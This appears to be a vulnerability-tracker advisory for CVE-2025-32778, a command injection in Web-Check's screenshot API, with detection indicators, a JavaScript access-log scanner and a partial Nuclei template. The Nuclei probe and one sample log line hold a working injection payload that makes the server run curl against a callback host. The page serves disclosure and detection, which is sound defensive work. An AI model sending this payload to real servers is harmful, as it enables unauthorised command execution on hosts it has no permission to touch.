CVE-2025-32778
Published 2025-04-15
Priority P187 · critical · 9.3 (CVSS 4.0)
ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 19.98% (97.1th percentile)
Web-Check is an all-in-one OSINT tool for analyzing any website. A command injection vulnerability exists in the screenshot API of the Web Check project (Lissy93/web-check). The issue stems from user-controlled input (url) being passed unsanitized into a shell command using exec(), allowing attackers to execute arbitrary system commands on the underlying host. This could be exploited by sending crafted url parameters to extract files or even establish remote access. The vulnerability has been patched by replacing exec() with execFile(), which avoids using a shell and properly isolates arguments.
Affected
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lissy93 | web-check | < 2.0.1 | 2.0.1 |
Detection & IOCs (extracted from sources)
- Monitor HTTP GET requests to /api/screenshot where the `url` query parameter contains shell metacharacters such as `;`, `%3b`, `%22`, `${IFS}`, or `#`; these are indicators of command injection attempts.
- Alert on outbound HTTP/DNS requests from the web server process (e.g., Node.js/Chromium) to unexpected external hosts, which may indicate successful command injection via the screenshot API (e.g., curl callback to an OOB interaction server).
- Detect use of child_process.exec() with user-supplied `url` parameter in Web-Check's directChromiumScreenshot() function; vulnerable instances will NOT have commit 0e4958aa10b2650d32439a799f6fc83a7cd46cef applied.
- Use interactsh or similar OOB callback detection: a successful probe will trigger an HTTP interaction from the target server, confirming RCE via the injected curl command.
- Fingerprint vulnerable Web-Check instances by checking for the string 'Web Check' in the response body (case-insensitive) before probing the screenshot endpoint.
- The vulnerability only exists in Web-Check instances running code prior to commit 0e4958aa10b2650d32439a799f6fc83a7cd46cef. Patched instances use execFile() instead of exec(), which does not invoke a shell and therefore neutralizes the injection.
- The injection point is specifically the `url` query parameter of the /api/screenshot endpoint; other endpoints are not described as affected by this CVE.
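The first indicator in this list, shell metacharacters in the `url` parameter of `/api/screenshot`, written as an access-log check. This is an added example, not code from Web-Check or from the sources quoted here. The log lines are constructed, the combined log format is an assumption, and the extra indicators (backtick, `$(`, `|`) and the repeated decoding go beyond what the page lists.

```javascript
// Added example, not Web-Check code: flag /api/screenshot requests whose
// decoded `url` parameter contains shell metacharacters.

// First four are the indicators named on this page; backtick, $( and | are
// an assumption added here for broader coverage.
const INDICATORS = [
  [';', /;/], ['"', /"/], ['${', /\$\{/], ['#', /#/],
  ['`', /`/], ['$(', /\$\(/], ['|', /\|/],
];

// Decode percent-encoding repeatedly so double-encoded input (%253b) is seen.
function fullyDecode(value, maxRounds = 3) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(current); } catch { break; } // malformed %xx
    if (next === current) break;
    current = next;
  }
  return current;
}

// Returns null unless the line is a /api/screenshot request with a `url`
// parameter; otherwise { client, url, hits }, hits = indicators found.
function inspectLine(line) {
  const m = line.match(/^(\S+) .*?"[A-Z]+ (\S+) HTTP\/[\d.]+"/);
  if (!m) return null;
  const [path, query = ''] = m[2].split(/\?(.*)/);
  if (path !== '/api/screenshot') return null;
  const raw = new URLSearchParams(query).get('url'); // decodes one layer
  if (raw === null) return null;
  const url = fullyDecode(raw);
  const hits = INDICATORS.filter(([, re]) => re.test(url)).map(([name]) => name);
  return { client: m[1], url, hits };
}

// Constructed access-log lines (combined log format, documentation addresses).
const SAMPLE_LOG = [
  '198.51.100.10 - - [15/Apr/2025:09:12:01 +0000] "GET /api/screenshot?url=https%3A%2F%2Fexample.com%2F HTTP/1.1" 200 48211',
  '203.0.113.7 - - [15/Apr/2025:09:13:44 +0000] "GET /api/screenshot?url=http://x%22%3bcurl${IFS}http://callback.example.invalid%3b%23 HTTP/1.1" 200 312',
  '203.0.113.7 - - [15/Apr/2025:09:14:02 +0000] "GET /api/screenshot?url=http://x%2522%253b HTTP/1.1" 200 312',
  '198.51.100.10 - - [15/Apr/2025:09:15:30 +0000] "GET /api/other?url=a%3bb HTTP/1.1" 200 97',
];

const suspicious = (lines) => lines.map(inspectLine).filter((r) => r && r.hits.length > 0);

console.log(suspicious(SAMPLE_LOG));
```

A hit is a triage signal rather than proof, since a legitimate target URL can contain `#` or `;`; correlate it with the outbound-connection indicator from the same list.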
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v4.0 | 9.3 | CRITICAL | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |
| vulncheck | | 9.3 | CRITICAL | |
No detection rules found.
Metasploit
Web-Check Screenshot API Command Injection RCE
This module exploits a command injection vulnerability in Web-Check's `/api/screenshot` endpoint. The `directChromiumScreenshot()` function uses `child_process.exec()` with unsanitized user input, allowing command injection via URL query parameters. The vulnerability was patched in commit 0e4958aa10b2650d32439a799f6fc83a7cd46cef by replacing `exec()` with `execFile()`.
Nuclei
Web-Check < 2.0.1 Screenshot API - OS Command Injection
nuclei · CVSS 9.3
CVE-2025-32778 [CRITICAL] Web-Check < 2.0.1 Screenshot API - OS Command Injection
```yaml
# Fragment only: the page's copy begins mid-template, at the end of the
# "Web Check" body-word matcher.
        part: body
        case-insensitive: true
        internal: true

  - raw:
      - |
        GET /api/screenshot?url=http://x%22%3bcurl${IFS}http://{{interactsh-url}}%3b%23 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 200
```